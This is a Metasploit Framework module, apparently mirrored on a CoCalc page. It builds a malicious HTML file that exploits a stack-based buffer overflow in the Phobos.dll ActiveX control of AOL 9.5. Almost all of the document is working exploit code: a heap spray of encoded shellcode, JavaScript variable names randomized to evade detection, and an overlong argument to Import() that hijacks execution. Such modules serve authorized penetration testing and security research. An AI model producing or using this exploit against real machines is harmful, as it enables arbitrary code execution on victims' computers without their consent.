CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/fileformat/aol_phobos_bof.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
##

7
# aol_phobos_bof.rb

8
#

9
# AOL 9.5 Phobos.Playlist 'Import()' Stack-based Buffer Overflow exploit for the Metasploit Framework

10
#

11
# Tested successfully on the following platforms:

12
#  - AOL 9.5 (Revision 4337.155) on Internet Explorer 7, Windows XP SP3

13
#

14
# Phobos.dll version tested:

15
# File Version: 9.5.0.1

16
# ClassID: A105BD70-BF56-4D10-BC91-41C88321F47C

17
# RegKey Safe for Script: False

18
# RegKey Safe for Init: False

19
# Implements IObjectSafety: False

20
# KillBitSet: False

21
#

22
# Due to the safe for initialization and safe for scripting settings of this ActiveX control,

23
# exploitation is possible only from Local Machine Zone, which means the victim must run the

24
# generated exploit file locally.

25
#

26
# Trancer

27
# http://www.rec-sec.com

28
##

29


30
class MetasploitModule < Msf::Exploit::Remote

31
  Rank = AverageRanking

32


33
  include Msf::Exploit::FILEFORMAT

34


35
  def initialize(info = {})

36
    super(update_info(info,

37
      'Name'           => 'AOL 9.5 Phobos.Playlist Import() Stack-based Buffer Overflow',

38
      'Description'    => %q{

39
        This module exploits a stack-based buffer overflow within Phobos.dll of AOL 9.5.

40
        By setting an overly long value to 'Import()', an attacker can overrun a buffer

41
        and execute arbitrary code.

42


43
        NOTE: This ActiveX control is NOT marked safe for scripting or initialization.

44
      },

45
      'License'        => MSF_LICENSE,

46
      'Author'         =>

47
        [

48
          'Trancer <mtrancer[at]gmail.com>'

49
        ],

50
      'References'     =>

51
        [

52
          [ 'OSVDB', '61964'],

53
          [ 'EDB', '11204' ],

54
          [ 'URL', 'http://www.rec-sec.com/2010/01/25/aol-playlist-class-buffer-overflow/' ],

55
        ],

56
      'DefaultOptions' =>

57
        {

58
          'EXITFUNC' => 'process',

59
          'DisablePayloadHandler' => true

60
        },

61
      'Payload'        =>

62
        {

63
          'Space'         => 1024,

64
          'BadChars'      => "\x00\x09\x0a\x0d'\\",

65
          'StackAdjustment' => -3500,

66
        },

67
      'Platform'       => 'win',

68
      'Targets'        =>

69
        [

70
          [ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0', { 'Ret' => 0x0C0C0C0C, 'Offset' => 1000 } ]

71
        ],

72
      'DisclosureDate' => '2010-01-20',

73
      'DefaultTarget'  => 0))

74


75
      register_options(

76
        [

77
          OptString.new('FILENAME',   [ false, 'The file name.',  'msf.html']),

78
        ])

79
  end

80


81
  def exploit

82


83
    # Encode the shellcode

84
    shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

85


86
    # Setup exploit buffers

87
    nops 	  = Rex::Text.to_unescape([target.ret].pack('V'))

88
    ret  	  = Rex::Text.uri_encode([target.ret].pack('L'))

89
    blocksize = 0x40000

90
    fillto    = 500

91
    offset 	  = target['Offset']

92


93
    # Randomize the javascript variable names

94
    phobos       = rand_text_alpha(rand(100) + 1)

95
    j_shellcode  = rand_text_alpha(rand(100) + 1)

96
    j_nops       = rand_text_alpha(rand(100) + 1)

97
    j_ret        = rand_text_alpha(rand(100) + 1)

98
    j_headersize = rand_text_alpha(rand(100) + 1)

99
    j_slackspace = rand_text_alpha(rand(100) + 1)

100
    j_fillblock  = rand_text_alpha(rand(100) + 1)

101
    j_block      = rand_text_alpha(rand(100) + 1)

102
    j_memory     = rand_text_alpha(rand(100) + 1)

103
    j_counter    = rand_text_alpha(rand(30) + 2)

104
    j_bla        = rand_text_alpha(rand(8) + 4)

105


106
    html = %Q|<html>

107
<object classid='clsid:A105BD70-BF56-4D10-BC91-41C88321F47C' id='#{phobos}'></object>

108
<script>

109
#{j_shellcode}=unescape('#{shellcode}');

110
#{j_nops}=unescape('#{nops}');

111
#{j_headersize}=20;

112
#{j_slackspace}=#{j_headersize}+#{j_shellcode}.length;

113
while(#{j_nops}.length<#{j_slackspace})#{j_nops}+=#{j_nops};

114
#{j_fillblock}=#{j_nops}.substring(0,#{j_slackspace});

115
#{j_block}=#{j_nops}.substring(0,#{j_nops}.length-#{j_slackspace});

116
while(#{j_block}.length+#{j_slackspace}<#{blocksize})#{j_block}=#{j_block}+#{j_block}+#{j_fillblock};

117
#{j_memory}=new Array();

118
for(#{j_counter}=0;#{j_counter}<#{fillto};#{j_counter}++)#{j_memory}[#{j_counter}]=#{j_block}+#{j_shellcode};

119


120
var #{j_ret}='';

121
for(#{j_counter}=0;#{j_counter}<=#{offset};#{j_counter}++)#{j_ret}+=unescape('#{ret}');

122
#{phobos}.Import(#{j_ret},'#{j_bla}','True','True');

123
</script>

124
</html>|

125


126
    print_status("Creating '#{datastore['FILENAME']}' file ...")

127


128
    file_create(html)

129
  end

130
end

131


132